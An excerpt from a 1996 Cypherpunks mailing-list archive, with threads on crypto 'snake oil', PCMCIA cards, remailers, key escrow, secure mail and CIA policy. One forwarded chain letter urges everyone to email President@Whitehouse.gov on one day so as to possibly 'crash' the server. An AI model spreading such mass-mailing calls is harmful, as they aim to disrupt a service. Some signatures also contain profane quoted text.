Howard Trickey, and Phil Winterbottom, with support from Dennis 
Ritchie."


Plan 9 resources cited:

     Anonymous FTP: plan9.att.com


University of Toronto site:

     http://www.ecf.toronto.edu/plan9


For those without BYTE access: PLN_9os







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sat, 24 Feb 1996 21:18:23 +0800
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: pcmcia
Message-ID: <199602230502.VAA04115@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 AM 2/22/96 +0000, you wrote:
>I am just assuming that the Association (PCMCIA) has a way of distributing
>specs, etc. 

You can call them in San Jose, CA @ 408 433 2273  
$475.00 for non-members, paper only.  $715, paper/CD both.

>I also assume they have a web page and all that, maybe 
>even a citizen-unit subscribed to this mailing list who probably could
>point us in the right direction.  

www.pc-card.com, I believe

>I think PCMCIA cards offer a lot of
>potential as wallets and general purpose privacy prophylaxis engines.

Absolutely, and without doubt.  They are coming.

>I don't know anything about the technology, but the device drivers, et al,
>could be publicly reviewed and recompiled on trusted machines, presumably,
>and the device itself could be tested (I assume) with a publicly 
>available routine that once again one could install from source, etc. 

There are commercially available drivers, tested rigorously.  Fortezza cards
and s/w are very solid, as well as other cards derived from that type of
technology.  Fortezza cards are self-testing.

>
>how much do the slots cost to add on to pc's that don't already have them?
>Is there a parallel interface, for instance, that can plug into a 
>printer port?

SCM Microsystems, 408 370 4888 has a "Swap Box" product.  I don't know the cost.

>--
>PJ
>------------------------------------------------------------------------
>
>On Thu, 22 Feb 1996, Adam Shostack wrote:
>
>> P.J. Ponder wrote:
>> 
>> | obligatory crypto comment: has anyone looked at the iPower card and 
>> | gotten one to play with? Where else could one get a PCMCIA card that was 
>> | programmable and had a little memory on it? How hard would it be to make 
>> | one - in other words, what could we get the cost down to for an 
>> | encrypting pcmcia card? there couldn't be much to it, really, could there?
>> 
>> 	I got one, its very badly documented; theres some source in
>> Visual basic for windoze.  I haven't had time to track down real docs
>> so I can do anything.  Anyone know who I can call to get real
>> documentation?
>> 
>> Adam
>> 
>> 
>> -- 
>> "It is seldom that liberty of any kind is lost all at once."
>> 					               -Hume
>> 
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 23 Feb 1996 21:03:31 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Let the Snake Oil Flow
In-Reply-To: <ad5232581a02100494c9@[205.199.118.202]>
Message-ID: <199602230206.VAA12870@homeport.org>
MIME-Version: 1.0
Content-Type: text


	While I'd never disagree with my good buddy Tim, let me tell
you all about the neatest medial hack since anesthesia, TMS, or
Transcranial Magnetic Stimulation!

	This astounding use of magnetic fields can stimulate or deaden
nerves through the skull!  Its being used right now in research
hospitals to create functional mappings of the human brain!

	An experiment I witnessed involved a volunteer who had his
cold nerves turned off by placing a small probe over his head.  He was
completely unable to feel the cold of an ice cube placed on his bare
skin!

	Snake oil?  No.  Its really out there, and is has real
possibilites.  But how is the lay person to tell?  With a car, you can
see if it turns on.  With a replacement for anesthetics, you can
decide if it works pretty easily.  "Can you tell that I just cut your
arm?"  But with crypto, you need to wade through the excellent, but
quite long, sci.crypt FAQ, if you even find a pointer to it. 

	Altavista comes back with 48000 hits when asked for Crypto.
"Introduction to cryptography" is a more tolerable 100 documents, but
how to know which are good, and which are snake oil?  The reputation
software to help filter is lacking.

	So, I see a value to flaming the snake oil salesmen loudly,
today.  Not that we shouldn't let the market handle the situation, but
part of that market is that crypto enthusiasts (aka cypherpunks) will
flame the snake oil salesmen.  Not that other issues you mention (such
as the behinds the scenes deals) aren't important, but in the face of
no information, we can't discuss that much.


Adam

Timothy C. May wrote:

| Well, it seems to me that letting some real snake oil out there could be a
| Good Thing. Being the Neo-Calvinist Darwinist that I am, I set that anyone
| who puts valuable information into "PowerPads" and "Stream-of-Consciousness
| Ciphers" pretty much deserves what he or she gets. I am not losing any
| sleep that Snake Oil Enterprises is hyping a conceptually flawed system.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sat, 24 Feb 1996 08:20:33 +0800
To: sameer@c2.org (sameer)
Subject: Internet Protest!
In-Reply-To: <199602230422.UAA12375@infinity.c2.org>
Message-ID: <199602230525.VAA00705@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello:

Please pass along this to anyone you know who has an email account! We
need to have everyone take part in this protest!

Mark


>From silber Thu Feb 22 20:56:33 1996
Received: (from silber@localhost) by mark.allyn.com (8.7/8.7) id UAA00520 for allyn; Thu, 22 Feb 1996 20:56:20 -0800 (PST)
Date: Thu, 22 Feb 1996 20:56:20 -0800 (PST)
From: Andy Silber <silber>
Message-Id: <199602230456.UAA00520@mark.allyn.com>
>From: Scott Bell <SBell@r2mail.r2.com>
>To: "Barry D. Ballard" <bballard@tonto.den.csci.csc.com>,
Status: RO

>        NED_PUEV <NED_PUEV@HP-Loveland-om2.om.hp.com>,
>        Radar <radar@itouch.net>,
>        Denise HP TechSupport <sdm@hpuerca.atl.hp.com>,
>        sgajar <sgajar@crosslink.net>
>Subject: FW: FWD>Bill O Rights
>Date: Wed, 21 Feb 96 14:27:43 PST
>Encoding: 120 TEXT
>X-Mailer: Microsoft Mail V3.0
>Status:
>
>
>
> ----------
>From: Dave Behrns
>To: MIS Mail Group
>Subject: FW: FWD>Bill O Rights
>Date: Wednesday, February 21, 1996 2:10PM
>
>
>
>>>To whoever may read this,
>>>
>>>This is not a typical letter, in that by passing it on to as
>>>many people as you can, you are taking part in what may yet become the
>>>world's biggest practical joke. The U.S. Government has rece ntly
>>>passed an act which enforces censorship on the internet. A group of
>>>internet users has now come together to kick back at this oppression,
>>>and have a bit of fun at the same time. >The aim of this exercise is
>>>to re-establish the United States as "The land of the Free", not a
>>>fascist state where freedom of speech and thought are curtailed.
>>>Communist Russia fell as a result of s uch limits being placed upon
>>>the minds of the general populus. On receiving this letter, please
>>>pass it on to as many friends or E-mail lists as you can. We predict
>>>that if everybody copies the lette r to 5 other addresses, by February
>>>29th 1996, this letter should have reached in excess of 2 million
>>>people. That's when the fun begins........ >On February 29th, please
>>>send the message:
>>>
>>>Dear Mr. President,
>>>Do you remember this:
>>>
>>>And afterwards enclose the pre-typed copy of the Bill of rights. By
>>>sending the letter on the date above, you will contribute to either
>>>one huge petition for freedom, or else lead to a crash of the
>>>whitehouse server.Send all letters to: >President@Whitehouse.gov
>>>
>>>Remember that solidarity is the key to success !!!!!
>>>
>>>
>>>---------------------------------------------------
>>>
>>>THE BILL OF RIGHTS
>>>
>>>Amendment I
>>>
>>>Congress shall make no law respecting an establishment of religion, or
>>>prohibiting the free exercise thereof; or abridging the freedom of
>>>speech, or of the press; or the right of the people peaceably to
>>>assemble, and to petition the government for a redress of grievances.
>>>
>>>Amendment II
>>>
>>>A well regulated militia, being necessary to the security of a free
>>>state, the right of the people to keep and bear arms, shall not be
>>>infringed.
>>>
>>>Amendment III
>>>
>>>No soldier shall, in time of peace be quartered in any house, without
>>>the consent of the owner, nor in time of war, but in a manner to be
>>>prescribed by law.
>>>
>>>Amendment IV
>>>
>>>The right of the people to be secure in their persons, houses,
>>>papers, and
>>>effects, against unreasonable searches and seizures, shall not be
>>>violated, and no warrants shall issue, but upon probable cause,
>>>supported by oath or affirmation, and particularly describing the
>>>place to be searched, and the persons or things to be seized.
>>>
>>>Amendment V
>>>
>>>No person shall be held to answer for a capital, or otherwise
>>>infamous
>>>crime, unless on a presentment or indictment of a grand jury, except
>>>in cases arising in the land or naval forces, or in the militia, when
>>>in actual service in time of war or public danger; nor shall any
>>>person be subject for the same offense to be twice put in jeopardy of
>>>life or limb; nor shall be compelled in any criminal case to be a
>>>witness against himself, nor be deprived of life, liberty, or
>>>property, without due process of law; nor shall private property be
>>>taken for public use, without just compensation.
>>>
>>>Amendment VI
>>>
>>>In all criminal prosecutions, the accused shall enjoy the right to a
>>>speedy and public trial, by an impartial jury of the state and
>>>district wherein the crime shall have been committed, which district
>>>shall have been previously ascertained by law, and to be informed of
>>>the nature and cause of the accusation; to be confronted with the
>>>witnesses against him; to have compulsory process for obtaining
>>>witnesses in his favor, and to have the assistance of counsel for his
>>>defense.
>>>
>>>Amendment VII
>>>
>>>In suits at common law, where the value in controversy shall exceed
>>>twenty dollars, the right of trial by jury shall be preserved, and no
>>>fact tried by a jury, shall be otherwise reexamined in any court of
>>>the United States, than according to the rules of the common law.
>>>
>>>Amendment VIII
>>>
>>>Excessive bail shall not be required, nor excessive fines imposed, nor
>>>cruel and unusual punishments inflicted.
>>>
>>>Amendment IX
>>>
>>>The enumeration in the Constitution, of certain rights, shall not be
>>>construed to deny or disparage others retained by the people.
>>>
>>>Amendment X
>>>
>>>The powers not delegated to the United States by the Constitution, nor
>>>prohibited by it to the states, are reserved to the states
>>>respectively, or to the people.
>>
>>
>>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sat, 24 Feb 1996 08:17:56 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers, Feb
Message-ID: <2.2.32.19960223053212.0069bd94@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:07 PM 2/22/96 -0500, Bryan Strawser <bstrawse@copper.ucs.indiana.edu>
wrote:

>The differences here are because gondolin.org had serious DNS problems
>in January that caused alot of mail to be bounced.  Those problems were
>rectified.. hence our traffic flows now...

Thank you, Bryan! This is _precisely_ the kind of info I'm interested in.

>The latency differences are normal for gondolin because we are not on the
>net, we get our mail via UUCP one hop away from the internet itself.  
>Since our polling is fairly irregular, our latency will move up and down 
>from month to month.

Makes sense. And I don't particularly care about variability as long as I
have a sense of the boundaries. Which my tests define for me. :-)

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Feb 1996 18:54:07 +0800
To: cypherpunks@toad.com
Subject: Re: Let the Snake Oil Flow
Message-ID: <ad5285b81e0210042b99@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:22 AM 2/23/96, sameer wrote:
>        All valid points, but when the likes of Nathaniel Borenstein &
>his cohorts use the failures of snake oil to discredit all
>cryptography, then we have a problem. (Not to say that Netscape is
>selling snake oil... but I figure that FV would capitalize on a snake
>oil failure to further their anti-cryptography agenda just as they
>have used the Netscape RNG bug)

Please don't misunderstand...I'm not _approving_ of snake oil, just
suggesting that maybe the list shouldn't go into paroxysms every time
someone reveals their Captain Midnight Decoder Ring crypto system.

Sci.crypt used to be wracked with such issues...I don't look at it much
these days, so I don't know if it still is. But the Cypherpunks list has
become the de facto place to debate new crypto systems, which we can look
at as an achievement as well as a curse, so it's inevitable that new
flavors of snake oil will be sold here every few weeks.

--Tim May

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 23 Feb 1996 07:35:24 +0800
To: cypherpunks@toad.com
Subject: Re: IPG HoaxRe: IPG Hoax?
Message-ID: <199602222131.WAA27984@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> I must admit that after the first day I've been wondering if this whole
> IPG thing isn't some kind of deep troll or early April Fool's joke.  

Well, not only is "Ralph" detweiling more intensely than anyone
since the original, hitting as many hot buttons as possible,
but he does an impressive job of trying to sound erudite by
quoting various literary figures while misspellling their names
(and misspeling other words far be-yond his obvious typ1ng defishncies.)

And, of course, if he _isn't_ a hoax, he's probably representative
of the rest of his company's quality process.

Either way, he's quite impressive!

                                Dos-toy-evsky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 23 Feb 1996 18:54:23 +0800
To: cypherpunks@toad.com
Subject: Re: Let the Snake Oil Flow
Message-ID: <ad52892020021004f86c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:38 AM 2/23/96, sameer wrote:
>>
>> Please don't misunderstand...I'm not _approving_ of snake oil, just
>> suggesting that maybe the list shouldn't go into paroxysms every time
>> someone reveals their Captain Midnight Decoder Ring crypto system.
>
>        Right. it's a tough call though. Suppose the list didn't go
>into paroxysms and someone lost big by using snake oil. Then our
>friends at FV will say "oh look at this crypto which lost people
>money". -- and we did nothing to prevent that opportunity.
>        I'm not saying that paroxysms are -good-, just that one should
>be wary of the consequences of what may happen if someone loses big to
>snake oil.

Right, a tough call.

Some people are more _interventionist_ than others. Me, I'm not too worried
that someone will "lose big" by listening to snake oil salesmen...people
lose big every day, by smoking, driving too fast, enlisting in the Army,
whatever. I long ago gave up trying to protect others.

(Why I participate so strongly in this list has various possible answers.
Nothing better to do is one theory. An interest in the implications of
strong cryptography is another theory. Being an introvert--in Jung's actual
terms, not the popular misinterpretation of Jung--is another.)

I guess I gave up on worrying too much about other people making the wrong
decsions. And given that "the Cypherpunks" have no organization, no role in
evaluating and recommending crypto code, except insofar as they act as
individuals, I don't worry too much about lost sheep going astray.

Those who used to believe in snake oil--the original kind--got culled out
of the population as a result. Religion now serves the same role,
especially Christian Science. Frankly, if people want to believe that First
Virtual is better than cryptography, or that Internet Security Guaranteed
can really guaranty security with their fabulations about prime wheels and
reusable one-time pads, then maybe the crypto-gullible will be culled--the
gullible are cullable.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 24 Feb 1996 13:51:56 +0800
To: "P.J. Ponder" <cypherpunks@toad.com
Subject: Re: Secure Mail (Was: IMC resolving security workshop)
Message-ID: <2.2.32.19960223063622.0089dbe4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 AM 2/23/96 +0000, P.J. Ponder wrote:

>ObSecureMail: I got the beta Pronto secure mail, but haven't had tome to 
>fool with it yet, then I got a mesage about a bad key or something. 
>What's up with that?

My experience so far has not been very positive.

I have tried both of the betas on Win95.  Neither of the betas have been
able to get past the "Synchronising keys" section of the setup.  The program
just keeps accessing my public keyring for almost 30 mins before it returns
a cryptic error 111.

What I have seen of it, I am not very happy with some of the design choices.
You should be able to tell it the hex id of the key that you want to use
with the mailer.  Nope!  It tries to find what it thinks the key should be
based on your e-mail address.  Since I have two keys under that address,
there is a wee bit of a problem.  I have tried generating a new one as well,
and i still get the problems with the key sync.  (As in it not completing
and ending with an obscure error message.)  So far, my last message to the
beta address has gone unanswered on this problem.

I would like to test it further, but getting that far has not been very easy
at this stage of the development.  Not a hopeful sign.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 24 Feb 1996 13:50:05 +0800
To: Mutant Rob <cypherpunks@toad.com
Subject: Re: url
Message-ID: <2.2.32.19960223064759.008c79c4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:23 AM 2/23/96 -0500, Mutant Rob wrote:
>Bill Frantz wrote:
>> 
>> At  2:52 PM 2/22/96 -0500, Perry E. Metzger wrote:
>> >Mike McNally writes:
>> >> At <URL:http://www.osf.org/~loverso/javascript/track-me.html> find
>> >> some interesting "surveillance" applications of Javascript.[..]
>> >When is the patch to let you disable JavaScript inside Netscape going
>> >to go out? Its more than time.
>> 
>> Why Perry, it's called Netscape 1.1N.  :-)
>
>I think the Options menu in Netscape allows you to disable it already.

You can disable Java but not Javascript via the security options.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 24 Feb 1996 07:02:45 +0800
To: cypherpunks@toad.com
Subject: opps, sorry about that last post
Message-ID: <199602230406.XAA27060@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  I'm not really unsubscribing, I'm moving to a new host. Sorry about
the noise.

-Ray







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <bstrawse@copper.ucs.indiana.edu>
Date: Sat, 24 Feb 1996 07:08:13 +0800
To: bruce@aracnet.com (Bruce Baugh)
Subject: Re: Remailers, Feb
In-Reply-To: <2.2.32.19960223034206.00686e9c@mail.aracnet.com>
Message-ID: <199602230407.XAA19370@copper.ucs.indiana.edu>
MIME-Version: 1.0
Content-Type: text/plain


> mix@remail.gondolin.org
>     February                    00          06:30       00:40       12:52
>     January                     08          11:37       03:58       18:36

The differences here are because gondolin.org had serious DNS problems
in January that caused alot of mail to be bounced.  Those problems were
rectified.. hence our traffic flows now...

The latency differences are normal for gondolin because we are not on the
net, we get our mail via UUCP one hop away from the internet itself.  
Since our polling is fairly irregular, our latency will move up and down 
from month to month.

Bryan


-- 
= Bryan Strawser / Indiana University / bstrawse@indiana.edu =  
= Live Free or Die / http://copper.ucs.indiana.edu/~bstrawse =   
=  Gondolin Technologies / http://www.gondolin.org/gondolin  =    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Feb 1996 08:20:22 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <ad52951b24021004c8e5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 AM 2/23/96, P.J. Ponder wrote:

>The first paragraph here bothered me.  If a user (or an organization)
>needs to have access to data that was encrypted by an associate ( or one
>of its employees) wouldn't sound practice require that the key not be
>entrusted to just one person?  I don't see the need for any fancy
>"key-recovery" protocol with any outside entities.  We can handle this
                                                     ^^^^^^^^^^^^^^^^^^
>internally in my shop.  Some keys I give a copy to Alice, and down the
 ^^^^^^^^^^^^^^^^^^^^^^

This is my perception, too, though I haven't been in Corporate America for
almost a decade. Still, I would encourage people to take this position,
that "we don't need no steenking key escrow!" (to borrow again the B.
Traven phrase I used yesterday)

>hall Bob has some, too.  If I get hit by the bus, they can get my company
>related data back.  We don't need any "service" or "licensee" or "trusted
>third party" or any of that, thank you very much.  And we don't need any
>one developing OTPs for us either, and we don't need government agencies
>keeping copies of any of our keys.

Bravo!

And we should all remember, again, that basic observation: even if "key
escrow" is needed to recover *stored* files, it sure ain't needed for
*communications*!!

The only entity that really has a compelling need for "key escrow" for
_communications_ is Big Bro himself, nto companies or individuals. Think
about it.

TIS is just playing the shill role for Big Brother and the Holding Company.


--Tim May

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Feb 1996 08:19:48 +0800
To: cypherpunks@toad.com
Subject: Expect A Wave of Killings of Journalists....
Message-ID: <ad529b3325021004378f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 PM 2/22/96, John Young wrote:
>   2-22-96. TWP:
>
>   "CIA Can Waive Prohibition Against Using U.S. Clergy Abroad
>   for Covert Work."
>
>      A controversial loophole permitting the CIA to recruit
>      American journalists as agents also allows the agency to
>      waive a similar 19-year-old ban on employing clerics or
>      missionaries. An official also disclosed that CIA
>      regulations prohibit recruiting employees of members of
>      Congress or congressional committees "without the
>      approval of the member" for whom they work.

I watched CIA Director John Deutch (or is it Deutsch?) explain today just
how the rules are being relaxed on having journalists as CIA operatives,
and I could practically hear a collective "Oh, Shit!" echo from the
journalistic capitals of the Second and Third Worlds.

Even when journalists were reporting to the intelligence agencies, they
like the convenient fiction that such practices were forbidden. Even so, a
couple of journalists were tagged by the governments they were spying on
and disposed of.

Expect this to increase. Except now it will likely be Russian Mafiosos
garrotting the "Washington Post" economics reporter in the back alleys off
the Arbat.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 24 Feb 1996 13:49:39 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <199602230759.XAA21453@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 2/22/96 -0800, Timothy C. May wrote:
>And we should all remember, again, that basic observation: even if "key
>escrow" is needed to recover *stored* files, it sure ain't needed for
>*communications*!!

If a key is being generated for two way communications, then it should be
generated via a protocol like Diffie-Hellman which leaves no recoverable
knowlege of the key outside the participants, and discarded when the
session is over of frequently, whichever occurs more often.  This procedure
will reduce the incentive for rubber hose attacks to recover these keys.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sat, 24 Feb 1996 08:20:27 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <Pine.3.89.9602222300.G20538-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Steve Walker wrote to John Young:

(large piece snipped; good stuff though.)

   +  Suppose the U.S. government had never thought of placing
      export controls on cryptography...

      We would now have widespread use of encryption, both
      domestically and worldwide; we would be in a state of
      "Utopia," with widespread availability of cryptography
      with unlimited key lengths. But, once in this state, we
      will face situations where we need a file that had been
      encrypted by an associate who is unavailable (illness,
      traffic jam, or change of jobs). We will then realize
      that we must have some systematic way to recover our
      encrypted information when the keys are unavailable.

      When we add a user-controlled key recovery capability to
      our Utopia, we find ourselves in an "Ultimate Utopia,"
      with unlimited key length cryptography, widely available
      through mass market applications, and user-controlled
      key recovery.

The first paragraph here bothered me.  If a user (or an organization)
needs to have access to data that was encrypted by an associate ( or one
of its employees) wouldn't sound practice require that the key not be
entrusted to just one person?  I don't see the need for any fancy
"key-recovery" protocol with any outside entities.  We can handle this
internally in my shop.  Some keys I give a copy to Alice, and down the
hall Bob has some, too.  If I get hit by the bus, they can get my company 
related data back.  We don't need any "service" or "licensee" or "trusted 
third party" or any of that, thank you very much.  And we don't need any 
one developing OTPs for us either, and we don't need government agencies 
keeping copies of any of our keys.

Am I in the state of utopia already, is this what "user controlled key 
recovery" means?  I think it's just common sense and sound management 
practice.  If you know that your co-worker/colleague/summer intern, etc 
is encrypting your business related data, you should make sure you can 
get it back if she doesn't come back from lunch.  Let her keep her own 
PGP passphrase, though. That's her business.
--
I am now going to push a button and cause this to quantumly re-assemble 
in California.  Really two buttons (Ctrl-X). One observes, one measures.
--
send message body: "unsubscribe cypherpunks yourmailbox@domain"  to: 
majordomo@toad.com to drop off the list. Don't put it in quotes, tho.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Fri, 23 Feb 1996 14:33:39 +0800
To: cypherpunks@toad.com
Subject: IMC resolving security workshop
Message-ID: <Pine.3.89.9602230058.H20538-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Raph for his excellent write-up on the IMC workshop "Resolving 
e-mail Security".

Thanks to IMC for sponsoring it and having an agenda, etc.

Thanks to the companies supporting IMC with corporate memberships, too.
hint, hint.

I am also concerned (as many on this list must be) about the 40 bits
and public perception.  If everyone thinks that Damien and the combined 
computing power of France is needed for two weeks to break it, then there 
is more teaching to be done, certainly.

Speaking of teaching, writing up one's notes after a meeting or 
conference and posting them to the list is an excellent benefit to those 
of us that didn't get to go.

ObSecureMail: I got the beta Pronto secure mail, but haven't had tome to 
fool with it yet, then I got a mesage about a bad key or something. 
What's up with that?
--
P.J. Ponder, individual member, IMC. (and proud of it)
--
EXTRA NOISE PART: I am trying to clean up al my typos so none will think 
I am IPGSales. (Yikes.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sat, 24 Feb 1996 08:20:20 +0800
To: cypherpunks@toad.com
Subject: Re: "consent of the governed"
Message-ID: <9602230603.AB12218@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

>I tend to define government more liberally in that it does
not
>merely exist to protect rights-- 

Since it is a man-made, created entity, on what vision of
reality
would you justify the existing principles of our 
collectivistic-oriented govt?

>the 20th century saw a rise in
>government that tried to be a social force. 

     The govt consists of a few individuals.

>this may have failed, 
>but it does point out that people want a government to do
more
>than merely protect their rights.

By 'peoples', do you mean productive population at large or a 
small bunch peoples who want their wishes to come true, no
matter
how many .38 special bullets it costs?

>  in other words, the 1776 definition
>of government is reasonably slightly modified.
                  ^^^^^^^^^^
?!?!!!  Would another adjective be more appropriate?

>government in its
>essence is a form of organized human collaboration/cooperation
imho.

Yeah!  With, ultimately, a *gun* under every pile of red tape,
just 
to make you "cooperate" more easily....

>it is a nervous system for a society.

Yes!  And it has epilepsy!

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMSzkYAOWptJXIUrtAQHdbwP+Kh7tCFRExtvWxxdkVG5nyuRDr8/PgAj6
jle8Rvh2ysGMwPyZguoBb8Hz0N9xp3pPEspAUcrvB6JsDo0mQUQ8Rf/zM420Yfvk
8xP5I/+H7PhZF8MbmjoFN3pIjywBi9YFykuLSlsg5snqBBSTi9EjcCiL79WfSpng
oM4XVYmTgpc=
=IQZn
-----END PGP SIGNATURE-----
**** NEW PGP 2.6.2 KEY *********
This key is actually suspended, as of Feb, 16 1996, was never distributed,
and might be subject to deletion.  Sorry for the trouble my mis-management might have caused.

2048 bits Key ID:24201BA1 1996/02/13 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  23 B6 24 31 86 67 FB 35  C7 A7 AF 12 A1 61 E9 3D 


**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sat, 24 Feb 1996 08:18:49 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602230622.BAA11095@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales <ipgsales@cyberstation.net> wrote:

Suggestion: wait a week until the flames on the c'punks list die 
down. Have the techie folks there read all of them, think about them, 
and come up with a coherent and well written reply that addresses all 
of those issues. Much easier to deal with than attacks from several 
dozen directions all of the time.

> Your point is well 
> taken and greatly appreciated; in make a hasty reply to but has nothing 
> to do with anything because at the time I 
> composed that, I was trying to be vague in a deliberate of 
> obscrurantism,because Derek, alone amoung you seem to understand what was 
> going on - and I made a stupid bluder -  I can do nothing about 
> that except to apologize, admit it freely and take my medicne from 
> Perry and the others - 
> 
> I can assure you that the quoted three 
> lines are not a part of the algorithms, and have never been. I 
> hope that you will forgive me for such a stupid blunder. I hope that 
> such stupidity on my part does not close your mind to even looking at 
